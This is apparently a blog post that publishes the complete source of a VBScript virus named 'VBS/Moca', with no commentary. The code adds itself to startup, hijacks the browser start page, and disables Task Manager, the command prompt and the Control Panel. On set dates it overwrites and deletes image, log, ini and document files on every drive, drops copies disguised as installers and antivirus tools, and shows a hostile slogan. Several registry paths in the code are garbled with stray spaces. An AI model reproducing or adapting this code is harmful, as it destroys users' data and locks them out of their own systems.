Random Post

Recent Post
Home » , » Csript Virus VBS

Csript Virus VBS

rem - VBS/Moca "DL BirthDay" Virus
rem - Written by D.L. on November 8th, 2003
rem - Written by D.L. on June 24th, 2010

On Error Resume Next
dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir=FSobj.GetSpecialFolder(1)



checkDate()
function checkDate()
    if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then
        beginInfestation()
        displayMessage()
        Dupler()       
        else
        plantTrojanizedFile()
    end if    
end function

function plantTrojanizedFile()
    set copySelf=FSobj.CreateTextFile(sysDir+"\sys-Moca.vbs")
    copySelf.close
    set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
    writeCopy()
    hackedFileData=replace(rawFileData,chr(42),chr(68))
    fixData=replace(hackedFileData,chr(37),chr(76))
    dataFixed=replace(fixData,chr(124),chr(46))
    newFileData=replace(dataFixed,chr(94),"""")
    set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-Moca.vbs",2)
    copySelfComplete.write newFileData
    copySelfComplete.close

    createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.it.polinpdg.ac.com"
    createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.it.polinpdg.ac.com"
    createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysMoca",sysDir&"\sys-Moca.vbs"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableC MD","1"," REG_DW ORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"   
    createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeCapti on", "THE d'commend-X - Moca-x"
    createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL "
    createRegKey "HKEY_CURRENT_USER/Control Panel/Mouse SwapMouseButtons", "1","REG_ DWORD"
end function

sub createRegKey(regKey,regVal)
     dim regEdit
     set regEdit=CreateObject("WScript.Shell")
     regEdit.RegWrite regKey,regVal
end sub

sub beginInfestation
     On Error Resume Next
     dim drive,machine,complete
    set machine=FSobj.Drives
     for each drive in machine 
         if (drive.DriveType=2)or(drive.DriveType=3) then
             indexFolders(drive.Path&"\")
        end If
    next
     beginInfestation=complete
end sub

sub indexFolders(location)
    On Error Resume Next
    dim specs, file, subFol
    set specs=FSobj.GetFolder(location)
    set subFol=specs.SubFolders

    for each file in subFol
        spreadData(file.Path)
        indexFolders(file.Path)
    next
end sub

sub spreadData(location)
    On Error Resume Next
        dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete
    set folder=FSobj.GetFolder(location)
    set directory=folder.Files

    orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca"
    mesStageTwo=replace(orgMes,chr(42),chr(68))
    mesStageThree=replace(mesStageTwo,chr(124),chr(46))
    finalMes=replace(mesStageThree,chr(37),chr(76))

    for each file in directory
        extName=lcase(FSobj.GetExtensionName(file.Path))
        complete=lcase(file.Name)

        if (extName="jpg")or(extName="gif")then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)

                elseIf (extName="log")or(extName="ini") then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)

                elseIf (extName="doc")or(extName="docx") then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)
        end if
    next
end sub

function Dupler()
    set Dupler = FSobj.GetFile (WScript.ScriptFull.Name)
        Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Moca.vbs" )
        Dupler.Copy ("C:\Documents and Settings\All Users\StartMenu\Programs\Startup\Desktop.ini.vbs")
        Dupler.Copy ("C:\Documents and Settings\AllUsers\Desktop\ Dajjal_Antivirus .exe.vbs" )
        Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")
        Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")
        Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )
        Dupler.Copy ("F:\Program\ Smadav. vbs")
        Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )
        Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )
        Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")
        Dupler.Copy ("J:\Program\ Project.vbs" )
        Dupler.Copy ("J:\Program\ SM?RTP.exe.vbs" )
        Dupler.Copy ("J:\Program\ %SM%RTP%.exe.vbs" )
        Dupler.Copy ("K:\Program\ Moca.vbs" )
end function

function displayMessage()
        dim shell,messageFile
    set shell = CreateObject("WScript.Shell")
    set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
    messageFile.close
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
    messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/Moca Virus")
    messageFile.WriteLine("@cls")
    messageFile.WriteLine("@@echo ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL")
    messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(")
    messageFile.WriteLine("@echo. When you kill me...! ")
    messageFile.WriteLine("@echo. i can delet all your file......! ")
    messageFile.WriteLine("@echo. you can try it....@_@")
    messageFile.WriteLine("@echo. say Fack for ISRAEL-say Fack for ISRAEL-say Fack for ISRAEL say-Fack for ISRAEL ")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@pause")
    messageFile.close
    shell.Run(sysDir&"\MocaMssg.bat")
end function

function writeCopy()
    rawFileData="rem - VBS/Moca ^DL BirthDay^ Virus by *|%|" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "dim FSobj,winDir,sysDir" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set sysDir=FSobj|GetSpecialFolder(1)" &vbcrlf& _
    "checkDate()" &vbcrlf& _
    "function checkDate()" &vbcrlf& _
    "if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then" &vbcrlf& _
    "beginInfestation()" &vbcrlf& _
    "displayMessage()" &vbcrlf& _     
        "end if" &vbcrlf& _
    "end function" &vbcrlf& _
    "sub beginInfestation" &vbcrlf& _
     "On Error Resume Next " &vbcrlf& _
     "dim drive,machine,complete" &vbcrlf& _
    "set machine=FSobj|Drives " &vbcrlf& _
     "for each drive in machine " &vbcrlf& _
     "if (drive|DriveType=2)or(drive|DriveType=3) then" &vbcrlf& _
     "indexFolders(drive|Path&^\^)" &vbcrlf& _
    "end If" &vbcrlf& _
    "next" &vbcrlf& _
     "beginInfestation=complete" &vbcrlf& _
    "end sub" &vbcrlf& _
    "sub indexFolders(location)" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "dim specs, file, subFol" &vbcrlf& _
    "set specs=FSobj|GetFolder(location)" &vbcrlf& _
    "set subFol=specs|SubFolders" &vbcrlf& _
    "for each file in subFol" &vbcrlf& _
    "spreadData(file|Path)" &vbcrlf& _
    "indexFolders(file|Path)" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "sub spreadData(location)" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
        "dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete" &vbcrlf& _
    "set folder=FSobj|GetFolder(location)" &vbcrlf& _
    "set directory=folder|Files" &vbcrlf& _
    "finalMes=^Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca^" &vbcrlf& _
    "for each file in directory" &vbcrlf& _
    "extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
    "complete=lcase(file|Name)" &vbcrlf& _
    "if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes " &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
        "elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes" &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
        "elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes" &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
    "end if" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "function displayMessage()" &vbcrlf& _
        "dim shell,messageFile" &vbcrlf& _
    "set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "messageFile.WriteLine(^@title Happy Birthday to me! :) - VBS/Moca Virus^)" &vbcrlf& _
    "messageFile.WriteLine(^@cls^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. When you kill me...! ^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. i can delet all your file......! ^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. you can try it....@_@^)" &vbcrlf& _
    "messageFile.WriteLine(^@pause^)"&vbcrlf& _
    "messageFile.close" &vbcrlf& _
    "shell|Run(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "end function"
end function
Share this article :

0 komentar:

Posting Komentar

Other Post

Other Post
 
Support : Your Link | Your Link | Your Link
Copyright © 2013. Gommbang - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger